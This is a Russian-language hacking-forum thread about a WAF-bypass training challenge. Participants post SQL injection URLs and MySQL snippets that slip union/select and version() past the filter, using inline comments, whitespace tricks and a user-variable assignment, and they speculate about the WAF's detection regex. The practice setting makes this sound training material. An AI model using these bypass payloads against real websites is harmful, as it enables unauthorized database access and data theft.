WAF-тренировка

Обсуждение в разделе «Песочница», начал(-а) BigBear, 14.03.2016.

  1. imildar

    imildar New Member

    Регистрация:
    4.03.2016
    Сообщения:
    2
    Одобрения:
    0
    Репутация:
    0
    version() фильтруется WAFом хостинга?
     
  2. cMs

    cMs New Member

    Регистрация:
    14.02.2017
    Сообщения:
    10
    Одобрения:
    0
    Репутация:
    0
    Доброго времени суток.
    Может,кто подскажет как пробросить в первом задание version().
    Синонемы функции блочит.(left,right and etc)
    Различные комбинации с обфусикацие тоже.
    Через Hex лишь в таблицу добавляет заhex-ое слово.
    Ы.З В каком направление капать. Во втором задание все прекрасно проходит.
    Ы.Ы.З Может и туплю, но хотелось бы получить хинт.
     
  3. leksadin

    leksadin Level 8

    Регистрация:
    19.01.2016
    Сообщения:
    117
    Одобрения:
    47
    Репутация:
    2

    Странно, это блочит WAF хостинга, а не самого задания...
     
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Регистрация:
    10.02.2012
    Сообщения:
    704
    Одобрения:
    588
    Репутация:
    65
    так и чего waf помучать)?
    раз уж репа все равно не выдаётся за таски

    Code:
    http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27union+select+1,2,3,version/**/()%23
    
     
    _________________________
    Это одобряет BabaDook.
  5. cMs

    cMs New Member

    Регистрация:
    14.02.2017
    Сообщения:
    10
    Одобрения:
    0
    Репутация:
    0
    WAF всеравно это фильтрует.Таким образом с самого начала пытался(кроме %23).Что бы прокинуть саму скуль для первого задания пришлось юзать такую конструкцию:
    Code:
    http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27/*union*/union/*select*/select%201,2,3,4%20--%20
    Не знаю, может проблема у меня, но тестовая площадка порой введет себя странно. Запрос вашего ввида у меня вначале не проходил. Я не понимал в чем проблема, но WAF уже тогда блочил union,select и т.п.А через пару дней после уже использования своей конструкции, решил еще разок закинуть простой ввид, который не должен был пахать,он сработал, что удивило меня.

    Ы.З Вопрос все еще открыт.
    Версия так же не заходит.
    Ы.Ы.З В третьем и 4, по сути тоже должен быть один запрос с некоторой поравкой на xss, но сама скуля(без внедреняя еще xss),что пашет на 3, не пашет на 4.
    Ы.Ы.Ы.З полные ответы думаю стоит стереть после ответа на воп, иначе не будет интереса.
    Спасибо за отклик.
     
    #45 cMs, 17.02.2017
    В последний раз редактировалось: 18.02.2017
  6. SooLFaa

    SooLFaa Reservists Of Antichat

    Регистрация:
    17.03.2014
    Сообщения:
    447
    Одобрения:
    410
    Репутация:
    129
    Всё равно моё мнение не надо вот так сливать таски. Хинтом помочь, да. А открыто постить решение лишает фана проходящих сие таски.
     
    _________________________
  7. t0ma5

    t0ma5 Reservists Of Antichat

    Регистрация:
    10.02.2012
    Сообщения:
    704
    Одобрения:
    588
    Репутация:
    65
    ой всё, первый вектор, первого таска

    кому интересно ещё валидные конструкции для селекта версии
    Code:
    select version/*!()*/;
    select version/*!(*//*!)*/;
    select version     ();
    select version     (         );
    select version(/*hm*/);
    
    select version
        -> (
        -> );
    
    select @@version;
    
    select 0+version()+0;
    
    select{MySqL_d_bSeLect/*!version*//*!()*/}/*:D*/;
    
    select version()zzz; /*хмм*/
    
    хехе кстати сейчас waf жестко валит запрос на слове version после словосочетаний union+select, кто раскрутит через union+select )? один рабочий вектор точно есть
     
    _________________________
    #47 t0ma5, 20.02.2017
    В последний раз редактировалось: 20.02.2017
    Это одобряют BabaDook и crlf.
  8. cMs

    cMs New Member

    Регистрация:
    14.02.2017
    Сообщения:
    10
    Одобрения:
    0
    Репутация:
    0
    Как раз вопрос в этом и был, как прокинуть version() в union+select.
    Само слово подчистую фильтрует, другие функции по типу left(), тоже не проходят(unhex,0x).
    Направление подкиньте.
     
  9. SooLFaa

    SooLFaa Reservists Of Antichat

    Регистрация:
    17.03.2014
    Сообщения:
    447
    Одобрения:
    410
    Репутация:
    129
    Комментарии.
     
    _________________________
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Регистрация:
    10.02.2012
    Сообщения:
    704
    Одобрения:
    588
    Репутация:
    65
    юзать переменные :)

    неа, уже не работает так
     
    _________________________
  11. SooLFaa

    SooLFaa Reservists Of Antichat

    Регистрация:
    17.03.2014
    Сообщения:
    447
    Одобрения:
    410
    Репутация:
    129
    Ооо и правда не работает, сам сервак блочит.
     
    _________________________
  12. cMs

    cMs New Member

    Регистрация:
    14.02.2017
    Сообщения:
    10
    Одобрения:
    0
    Репутация:
    0
    @ - блочит
    Или создание переменной можно как-то этако?
     
  13. t0ma5

    t0ma5 Reservists Of Antichat

    Регистрация:
    10.02.2012
    Сообщения:
    704
    Одобрения:
    588
    Репутация:
    65
    да это был тот вектор.. сегодня утром ещё не блочило, слава админам :D
     
    _________________________
  14. cMs

    cMs New Member

    Регистрация:
    14.02.2017
    Сообщения:
    10
    Одобрения:
    0
    Репутация:
    0
    Я смотрю тут оперативно чекают форум и правят WAF
     
  15. t0ma5

    t0ma5 Reservists Of Antichat

    Регистрация:
    10.02.2012
    Сообщения:
    704
    Одобрения:
    588
    Репутация:
    65
    хех ладно пусть чекают, валидный вектор :D
    Code:
    http://test.test-me.pp.ru/url1/inj_test.php?username=admin%27+and+@:=version()union+select@,2,3,""%23
    
     
    _________________________
    Это одобряют cMs и st55.
  16. cMs

    cMs New Member

    Регистрация:
    14.02.2017
    Сообщения:
    10
    Одобрения:
    0
    Репутация:
    0
    Я думал, как только встречается символ/слово,etc WAF его чекает среди мусора, а вон оно как, просто безымянная переменная+: и он уже съел. И в селекте просто пробел убираем он прилепает, скулька хавает, а WAF не видит. Все больше вникая, в суть данного вида уязвимости, приходишь к выводу,что это защита от протечки с помощью сита.

    За ответ спс. Попробую развить данную мысль.
     
  17. t0ma5

    t0ma5 Reservists Of Antichat

    Регистрация:
    10.02.2012
    Сообщения:
    704
    Одобрения:
    588
    Репутация:
    65
    ну waf вынужденная мера, а сито ситу рознь)
    просто там регекс видимо такой
    union.*select.*(@|version)
    собственно да пробел перед переменной и селектором не обязателен, хм ищу альтернативу, пофиксят скоро наверно)
     
    _________________________
  18. cMs

    cMs New Member

    Регистрация:
    14.02.2017
    Сообщения:
    10
    Одобрения:
    0
    Репутация:
    0
    lol, уже блочит.
     
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Регистрация:
    10.02.2012
    Сообщения:
    704
    Одобрения:
    588
    Репутация:
    65
    вот ведь -_-
     
    _________________________
  20. st55

    st55 Banned

    Регистрация:
    20.04.2016
    Сообщения:
    125
    Одобрения:
    130
    Репутация:
    32
    Оперативно, однако. Собаку добавили в фильтр.
     
    Это одобряет t0ma5.